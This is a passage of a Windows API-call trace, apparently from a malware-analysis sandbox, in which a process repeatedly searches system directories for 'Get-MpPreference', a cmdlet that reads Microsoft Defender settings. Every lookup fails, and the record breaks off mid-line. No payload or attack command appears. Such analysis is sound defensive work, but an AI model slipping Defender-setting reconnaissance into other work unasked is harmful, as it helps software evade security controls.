[0052.256] GetLastError () returned 0x2 [0052.256] SetErrorMode (uMode=0x1) returned 0x1 [0052.256] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.JSE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.256] GetLastError () returned 0x2 [0052.256] SetErrorMode (uMode=0x1) returned 0x1 [0052.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.256] GetLastError () returned 0x2 [0052.256] SetErrorMode (uMode=0x1) returned 0x1 [0052.256] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.WSF", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.256] GetLastError () returned 0x2 [0052.256] SetErrorMode (uMode=0x1) returned 0x1 [0052.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.257] GetLastError () returned 0x2 [0052.257] SetErrorMode (uMode=0x1) returned 0x1 [0052.257] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.WSH", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.257] GetLastError () returned 0x2 [0052.257] SetErrorMode (uMode=0x1) returned 0x1 [0052.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.257] GetLastError () returned 0x2 [0052.257] SetErrorMode (uMode=0x1) returned 0x1 [0052.257] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference.MSC", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.257] GetLastError () returned 0x2 [0052.257] SetErrorMode (uMode=0x1) returned 0x1 [0052.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.257] GetLastError () returned 0x2 [0052.257] SetErrorMode (uMode=0x1) returned 0x1 [0052.258] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Get-MpPreference", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.258] GetLastError () returned 0x2 [0052.258] SetErrorMode (uMode=0x1) returned 0x1 [0052.260] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.260] GetLastError () returned 0x2 [0052.260] SetErrorMode (uMode=0x1) returned 0x1 [0052.260] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.ps1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.260] GetLastError () returned 0x2 [0052.260] SetErrorMode (uMode=0x1) returned 0x1 [0052.260] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.260] GetLastError () returned 0x2 [0052.260] SetErrorMode (uMode=0x1) returned 0x1 [0052.260] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.psm1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.260] GetLastError () returned 0x2 [0052.260] SetErrorMode (uMode=0x1) returned 0x1 [0052.261] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.261] GetLastError () returned 0x2 [0052.261] SetErrorMode (uMode=0x1) returned 0x1 [0052.261] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.psd1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.261] GetLastError () returned 0x2 [0052.261] SetErrorMode (uMode=0x1) returned 0x1 [0052.261] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.261] GetLastError () returned 0x2 [0052.261] SetErrorMode (uMode=0x1) returned 0x1 [0052.261] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.COM", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.261] GetLastError () returned 0x2 [0052.261] SetErrorMode (uMode=0x1) returned 0x1 [0052.261] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.261] GetLastError () returned 0x2 [0052.261] SetErrorMode (uMode=0x1) returned 0x1 [0052.262] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.EXE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.262] GetLastError () returned 0x2 [0052.262] SetErrorMode (uMode=0x1) returned 0x1 [0052.262] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.262] GetLastError () returned 0x2 [0052.262] SetErrorMode (uMode=0x1) returned 0x1 [0052.262] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.BAT", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.262] GetLastError () returned 0x2 [0052.262] SetErrorMode (uMode=0x1) returned 0x1 [0052.262] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.262] GetLastError () returned 0x2 [0052.262] SetErrorMode (uMode=0x1) returned 0x1 [0052.262] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.CMD", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.263] GetLastError () returned 0x2 [0052.263] SetErrorMode (uMode=0x1) returned 0x1 [0052.263] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.263] GetLastError () returned 0x2 [0052.263] SetErrorMode (uMode=0x1) returned 0x1 [0052.263] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.VBS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.263] GetLastError () returned 0x2 [0052.263] SetErrorMode (uMode=0x1) returned 0x1 [0052.263] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.263] GetLastError () returned 0x2 [0052.263] SetErrorMode (uMode=0x1) returned 0x1 [0052.263] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.VBE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.263] GetLastError () returned 0x2 [0052.263] SetErrorMode (uMode=0x1) returned 0x1 [0052.263] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.263] GetLastError () returned 0x2 [0052.264] SetErrorMode (uMode=0x1) returned 0x1 [0052.264] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.JS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.264] GetLastError () returned 0x2 [0052.264] SetErrorMode (uMode=0x1) returned 0x1 [0052.264] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.264] GetLastError () returned 0x2 [0052.264] SetErrorMode (uMode=0x1) returned 0x1 [0052.264] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.JSE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.264] GetLastError () returned 0x2 [0052.264] SetErrorMode (uMode=0x1) returned 0x1 [0052.264] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.264] GetLastError () returned 0x2 [0052.264] SetErrorMode (uMode=0x1) returned 0x1 [0052.264] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.WSF", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.265] GetLastError () returned 0x2 [0052.265] SetErrorMode (uMode=0x1) returned 0x1 [0052.265] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.265] GetLastError () returned 0x2 [0052.265] SetErrorMode (uMode=0x1) returned 0x1 [0052.265] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.WSH", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.265] GetLastError () returned 0x2 [0052.265] SetErrorMode (uMode=0x1) returned 0x1 [0052.265] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.265] GetLastError () returned 0x2 [0052.265] SetErrorMode (uMode=0x1) returned 0x1 [0052.265] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference.MSC", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.265] GetLastError () returned 0x2 [0052.265] SetErrorMode (uMode=0x1) returned 0x1 [0052.266] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0052.266] GetLastError () returned 0x2 [0052.266] SetErrorMode (uMode=0x1) returned 0x1 [0052.266] FindFirstFileW (in: lpFileName="C:\\Windows\\Get-MpPreference", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.266] GetLastError () returned 0x2 [0052.266] SetErrorMode (uMode=0x1) returned 0x1 [0052.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.266] GetLastError () returned 0x2 [0052.266] SetErrorMode (uMode=0x1) returned 0x1 [0052.266] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.ps1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.266] GetLastError () returned 0x2 [0052.266] SetErrorMode (uMode=0x1) returned 0x1 [0052.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.266] GetLastError () returned 0x2 [0052.266] SetErrorMode (uMode=0x1) returned 0x1 [0052.267] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.psm1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.267] GetLastError () returned 0x2 [0052.267] SetErrorMode (uMode=0x1) returned 0x1 [0052.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.267] GetLastError () returned 0x2 [0052.267] SetErrorMode (uMode=0x1) returned 0x1 [0052.267] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.psd1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.267] GetLastError () returned 0x2 [0052.267] SetErrorMode (uMode=0x1) returned 0x1 [0052.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.267] GetLastError () returned 0x2 [0052.267] SetErrorMode (uMode=0x1) returned 0x1 [0052.267] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.COM", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.268] GetLastError () returned 0x2 [0052.268] SetErrorMode (uMode=0x1) returned 0x1 [0052.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.268] GetLastError () returned 0x2 [0052.268] SetErrorMode (uMode=0x1) returned 0x1 [0052.268] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.EXE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.268] GetLastError () returned 0x2 [0052.268] SetErrorMode (uMode=0x1) returned 0x1 [0052.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.268] GetLastError () returned 0x2 [0052.268] SetErrorMode (uMode=0x1) returned 0x1 [0052.268] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.BAT", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.268] GetLastError () returned 0x2 [0052.268] SetErrorMode (uMode=0x1) returned 0x1 [0052.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.269] GetLastError () returned 0x2 [0052.269] SetErrorMode (uMode=0x1) returned 0x1 [0052.269] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.CMD", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.269] GetLastError () returned 0x2 [0052.269] SetErrorMode (uMode=0x1) returned 0x1 [0052.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.269] GetLastError () returned 0x2 [0052.269] SetErrorMode (uMode=0x1) returned 0x1 [0052.269] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.VBS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.269] GetLastError () returned 0x2 [0052.269] SetErrorMode (uMode=0x1) returned 0x1 [0052.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.269] GetLastError () returned 0x2 [0052.269] SetErrorMode (uMode=0x1) returned 0x1 [0052.270] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.VBE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.270] GetLastError () returned 0x2 [0052.270] SetErrorMode (uMode=0x1) returned 0x1 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.270] GetLastError () returned 0x2 [0052.270] SetErrorMode (uMode=0x1) returned 0x1 [0052.270] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.JS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 